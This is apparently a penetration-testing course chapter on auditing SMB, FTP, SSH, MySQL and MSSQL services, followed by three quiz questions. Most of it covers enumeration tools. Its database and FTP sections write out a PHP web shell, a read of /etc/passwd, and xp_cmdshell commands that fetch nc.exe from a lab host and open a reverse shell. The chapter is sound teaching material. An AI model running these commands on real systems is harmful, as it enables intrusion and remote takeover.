4.3 Network Services Auditing: SMB, FTP, SSH & Databases
Key Takeaways
Server Message Block (SMB) auditing using enum4linux and smbclient reveals accessible shares, user accounts, password policies, and critical flaws like EternalBlue (MS17-010).
Auditing File Transfer Protocol (FTP) instances isolates anonymous login access, directory traversals, and writable web document roots that permit web shell deployment.
Secure Shell (SSH) inspection identifies daemon version banners, allowed authentication mechanisms (passwords vs. public keys), and weak encryption ciphers.
Database auditing across MySQL (3306) and Microsoft SQL Server (1433) targets default credentials (root, sa), unauthenticated access, and OS command execution via xp_cmdshell.
Server Message Block (SMB) & Samba Auditing
The Server Message Block (SMB) protocol is a client-server communication protocol used for sharing access to files, printers, serial ports, and miscellaneous network communication endpoints (named pipes and Remote Procedure Calls) across a network. On Unix and Linux systems, SMB is implemented via Samba. Because SMB natively handles authentication, user authorization, and network file storage, misconfigurations or software flaws in SMB services frequently yield high-impact footholds during penetration testing.
SMB Architecture, Ports & Protocol Versions
SMB operates across several transport mechanisms and network ports:
- Port 137/UDP & 138/UDP: NetBIOS Name Service and NetBIOS Datagram Service, used for legacy local network name resolution and browsing.
- Port 139/TCP: NetBIOS Session Service, used for legacy NetBIOS-over-TCP SMB communication.
- Port 445/TCP: Direct-hosted SMB over TCP/IP, standard in all modern Windows and Samba deployments.
The SMB protocol has evolved across several major versions:
- SMBv1 (CIFS): Legacy version introduced in early Windows operating systems. It lacks modern security features, supports unencrypted communications, and contains severe architectural flaws, such as the buffer overflow in Srv!SrvOs2FeaToNt transactions exploited by EternalBlue (MS17-010 / CVE-2017-0144).
- SMBv2: Introduced with Windows Vista and Windows Server 2008. Enhanced performance, compound requests, and security.
- SMBv3: Introduced with Windows 8 and Windows Server 2012. Added end-to-end AES encryption, secure dialect negotiation, and protection against man-in-the-middle attacks.
Automated Auditing with enum4linux
enum4linux is a dedicated Perl wrapper built around Samba client utilities (smbclient, rpcclient, net, and nmblookup) designed to extract information from Windows and Samba hosts. A modern Python-based alternative, enum4linux-ng, provides similar capabilities with JSON export options.
Common enum4linux flags include:
# Run all simple enumeration checks (users, shares, password policy, groups)
enum4linux -a 10.10.10.5
# Enumerate user accounts only
enum4linux -U 10.10.10.5
# Enumerate available file shares
enum4linux -S 10.10.10.5
# Enumerate password policy details
enum4linux -P 10.10.10.5
# Enumerate security groups
enum4linux -G 10.10.10.5
The password policy query (-P) is critical prior to initiating password-guessing attacks. It discloses:
- Account Lockout Threshold: The number of failed attempts before an account is locked. If the threshold is 3 or 5, running broad password brute-forcing with Hydra will lock out enterprise accounts, disrupting operations.
- Minimum Password Length: Establishes wordlist filtering boundaries.
Manual Share Enumeration with smbclient
Penetration testers use smbclient to manually inspect shares, test credentials, and download files.
Listing Shares via Anonymous / Null Sessions
A null session occurs when a client connects to an SMB server with an empty username and empty password. To list available shares anonymously:
smbclient -L //10.10.10.5/ -N
# The -L flag lists shares; -N suppresses the password prompt
Sharename Type Comment
--------- ---- -------
ADMIN\$ Disk Remote Admin
C\$ Disk Default share
IPC\$ IPC Remote IPC
public Disk Public Departmental Files
backups Disk System Backups
In this output:
ADMIN\$andC\$are default administrative shares accessible only to administrative accounts.IPC\$(Inter-Process Communication) supports named pipes for RPC communication.publicandbackupsare custom shares. Testers immediately inspect whetherpublicorbackupspermits unauthenticated access.
Connecting to a Discovered Share
smbclient //10.10.10.5/public -N
# smb: \> dir
# smb: \> get department_notes.txt
# smb: \> exit
If valid credentials (student:Password123) were recovered during prior enumeration:
smbclient //10.10.10.5/backups -U "student%Password123"
Querying Named Pipes with rpcclient & RID Cycling
When IPC\$ allows null session connections, testers can establish an interactive session using rpcclient to query Active Directory or local SAM accounts:
rpcclient -U "" -N 10.10.10.5
# Inside rpcclient prompt:
rpcclient \$> enumdomusers
# user:[Administrator] rid:[0x1f4]
# user:[Guest] rid:[0x1f5]
# user:[jdoe] rid:[0x3e8]
# user:[asmith] rid:[0x3e9]
rpcclient \$> queryuser 0x3e8
If enumdomusers is restricted, testers employ RID Cycling. Because Windows assigns Relative Identifiers (RIDs) sequentially starting at 500 (0x1f4) for the built-in Administrator, 501 for Guest, and 1000 (0x3e8) upward for standard users, an automated loop querying queryuser <RID> extracts user accounts sequentially even when bulk listing is restricted.
Nmap NSE SMB Scripts
Nmap includes several powerful NSE scripts for SMB auditing:
# Enumerate SMB shares and check read/write access
nmap -p 445 --script smb-enum-shares 10.10.10.5
# Enumerate domain and local users via SMB
nmap -p 445 --script smb-enum-users 10.10.10.5
# Audit host for MS17-010 (EternalBlue) vulnerability
nmap -p 445 --script smb-vuln-ms17-010 10.10.10.5
File Transfer Protocol (FTP) Service Auditing
The File Transfer Protocol (FTP) operates on port 21/TCP for control communication and either port 20/TCP (Active mode data) or arbitrary high ports (Passive mode data). FTP transmits credentials and data in cleartext.
Anonymous Authentication Verification
A critical misconfiguration in FTP services is enabling anonymous login, allowing users to authenticate without valid domain or local credentials. Testers verify anonymous access manually:
ftp 10.10.10.5
# Name (10.10.10.5:user): anonymous
# Password: <press Enter or type anonymous@example.com>
# 230 Login successful.
ftp> ls -la
To automate this check across multiple hosts, use the Nmap ftp-anon script:
nmap -p 21 --script ftp-anon 10.10.10.5
High-Impact FTP Misconfigurations
When auditing FTP, testers assess three critical risk factors:
- Sensitive File Exposure: Administrators frequently use FTP for automated system backups, staging configuration files, or database dumps. Review file listings for
.sql,.bak,.zip,web.config,config.php, or hardcoded API keys. - Directory Traversal: Certain legacy FTP daemons (or misconfigured chroot jails) allow path traversal (
cd ../../../etc/), allowing attackers to navigate outside the intended FTP home directory. - Writable Web Root: If the FTP service's root directory is mapped to the web server's document root (such as
/var/www/htmlfor Apache orC:\inetpub\wwwrootfor IIS), and anonymous users possess write permissions, an attacker can upload a web shell (cmd.phporshell.aspx):
ftp> put webshell.php
# 226 Transfer complete.
The tester then requests http://10.10.10.5/webshell.php?cmd=id in a web browser, converting an anonymous FTP write into immediate remote code execution.
Active vs. Passive FTP Modes
FTP transfers data over a separate channel from control commands:
- Active Mode (
PORT): The client opens a random high port and instructs the server to connect back to it from port 20. If the client is behind a NAT or firewall, inbound connections are dropped, causing file listings to hang. - Passive Mode (
PASV): The client asks the server to open a listening port, and the client establishes the outbound data connection. When auditing FTP from behind a VPN or NAT, enterpassivein the FTP prompt to avoid connection timeouts.
Secure Shell (SSH) Service Auditing
Secure Shell (SSH) operates on port 22/TCP, providing encrypted command-line administration. While modern OpenSSH implementations are resilient against remote exploitation, improper configurations and legacy versions present attack vectors.
Banner Grabbing and OS Fingerprinting
Querying the SSH service banner provides precise information about the OpenSSH version and underlying Linux distribution:
nc -nv 10.10.10.5 22
# Output:
# SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8
This banner confirms:
- Protocol version 2.0.
- OpenSSH version 7.2p2.
- Distribution package
Ubuntu-4ubuntu2.8, matching Ubuntu 16.04 LTS (Xenial Xerus).
SSH Protocol 1 vs. Protocol 2
Legacy SSH implementations support Protocol 1 (SSH-1), which suffers from fundamental design weaknesses, including the CRC32 compensation attack (allowing plaintext insertion and session manipulation). Modern standards mandate Protocol 2 (SSH-2). To check whether Protocol 1 is supported:
ssh -1 user@10.10.10.5
# Modern servers respond with: "Protocol major versions differ: 1 vs. 2"
Enumerating Supported Authentication Methods
Knowing whether an SSH server permits password authentication or strictly enforces public key cryptographic authentication (publickey) is critical before planning credential attacks:
# Query authentication methods using SSH verbose mode
ssh -v -o PreferredAuthentications=none 10.10.10.5
# Output snippet:
# debug1: Authentications that can continue: publickey,password
Alternatively, use the Nmap ssh-auth-methods script:
nmap -p 22 --script ssh-auth-methods 10.10.10.5
If the output only permits publickey, online password brute-forcing with Hydra or Metasploit will fail, as the server will reject all password attempts before checking credentials.
Weak Cryptographic Ciphers & Algorithms
To audit whether the SSH daemon supports outdated or weak ciphers (such as 3DES, RC4, or CBC-mode ciphers vulnerable to Sweet32 / CVE-2016-2183):
nmap -p 22 --script ssh2-enum-algos 10.10.10.5
Database Services Auditing: MySQL & Microsoft SQL Server
Database daemons store high-value application data, user credentials, and intellectual property. During security assessments, database services frequently suffer from default administrative credentials, empty passwords, and dangerous stored procedures that allow operating system command execution.
MySQL Auditing (Port 3306/TCP)
MySQL (and its open-source fork MariaDB) defaults to port 3306/TCP.
Default Credentials & Empty Passwords
In development environments and test deployments, the administrative root account is frequently left with an empty or blank password. Testers test authentication directly using the mysql client:
mysql -h 10.10.10.5 -u root -p
# When prompted for password, press Enter directly
To audit across multiple targets, use the Nmap NSE scripts:
nmap -p 3306 --script mysql-empty-password,mysql-info 10.10.10.5
Basic Database Enumeration Queries
Once connected to a MySQL instance, run basic queries to identify system properties and sensitive tables:
-- Query database version and active user
SELECT VERSION(), USER();
-- List all databases on the instance
SHOW DATABASES;
-- Select and query an application database
USE webapp_db;
SHOW TABLES;
SELECT username, password FROM users;
-- Inspect user privileges and hosts permitted to connect
SELECT host, user, authentication_string FROM mysql.user;
File System Read/Write Capabilities
If the MySQL server runs with appropriate file privileges and the secure_file_priv variable is empty, an authenticated user can read sensitive files from the underlying operating system:
-- Read /etc/passwd directly through MySQL
SELECT LOAD_FILE('/etc/passwd');
-- Write a PHP web shell into an accessible web root
SELECT '<?php system(\$_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';
Microsoft SQL Server (MSSQL) Auditing (Port 1433/TCP)
Microsoft SQL Server operates on port 1433/TCP. The default administrative account is sa (System Administrator).
Automated Auditing with Nmap
# Audit MSSQL instance info and test for empty sa password
nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-ntlm-info 10.10.10.5
The ms-sql-ntlm-info script queries the SQL Server authentication endpoint to disclose internal domain names, NetBIOS machine names, and Windows operating system versions.
Remote Command Execution via xp_cmdshell
The most critical exploitation vector on an MSSQL instance is the extended stored procedure xp_cmdshell. When enabled, xp_cmdshell executes operating system commands directly in the context of the SQL Server service account (frequently NT AUTHORITY\NETWORK SERVICE or NT AUTHORITY\SYSTEM).
While disabled by default in modern MSSQL installations, any user with sa or sysadmin privileges can dynamically re-enable it via SQL queries:
-- Step 1: Enable advanced options
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
-- Step 2: Enable xp_cmdshell
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
-- Step 3: Execute operating system commands
EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell 'powershell -c "Invoke-WebRequest -Uri http://10.10.10.14/nc.exe -OutFile C:\Windows\Temp\nc.exe"';
EXEC xp_cmdshell 'C:\Windows\Temp\nc.exe 10.10.10.14 4444 -e cmd.exe';
Executing xp_cmdshell allows an attacker to bridge from database access directly to an interactive command shell on the Windows operating system.
Network Services Auditing Reference Table
| Service Name | Default Port(s) | Default Accounts | Key Enumeration Commands / Scripts |
|---|---|---|---|
| SMB / Samba | 139/TCP, 445/TCP | Guest, Anonymous, Administrator | enum4linux -a <ip>; smbclient -L //<ip>/ -N; nmap --script smb-enum-shares -p 445 <ip> |
| FTP | 21/TCP | anonymous / blank, ftp / blank | ftp <ip>; nmap --script ftp-anon -p 21 <ip> |
| SSH | 22/TCP | root, admin | nc -nv <ip> 22; ssh -v -o PreferredAuthentications=none <ip>; nmap --script ssh2-enum-algos -p 22 <ip> |
| MySQL | 3306/TCP | root / blank, root / root | mysql -h <ip> -u root -p; nmap --script mysql-empty-password -p 3306 <ip> |
| MSSQL | 1433/TCP | sa / blank, sa / Password123 | nmap --script ms-sql-info,ms-sql-empty-password -p 1433 <ip>; EXEC xp_cmdshell '<cmd>'; |
| PostgreSQL | 5432/TCP | postgres / blank, postgres / postgres | psql -h <ip> -U postgres; nmap --script pgsql-databases -p 5432 <ip> |
A penetration tester uses smbclient to audit an SMB service on port 445. Which command sequence correctly attempts to list available shares anonymously without prompting for a password?
smbclient -W WORKGROUP -U root%root //10.10.10.5/
smbclient --download-all //10.10.10.5/IPC$
smbclient -L //10.10.10.5/ -N
smbclient -A /etc/shadow //10.10.10.5/admin
An anonymous FTP login audit reveals read and write access to the directory hosting the target organization's public Apache web documents (/var/www/html). How should the tester proceed to achieve remote code execution?
Issue the passive command and download all image assets to calculate MD5 hashes.
Upload a PHP web shell script via the FTP put command and invoke it by requesting its URL through a web browser.
Use the FTP site chmod command to change the permissions of /etc/shadow to 777.
Restart the FTP daemon using the quote restart command to force a memory buffer overflow.
After successfully authenticating to an administrative Microsoft SQL Server (MSSQL) database account on port 1433, which feature can be enabled to execute operating system commands directly on the database host?
The MySQL LOAD_FILE() function.
The NetBIOS Name Service broadcast protocol.
The Samba smbclient file transfer utility.
The xp_cmdshell extended stored procedure.
Sections you finish are checked off in the contents.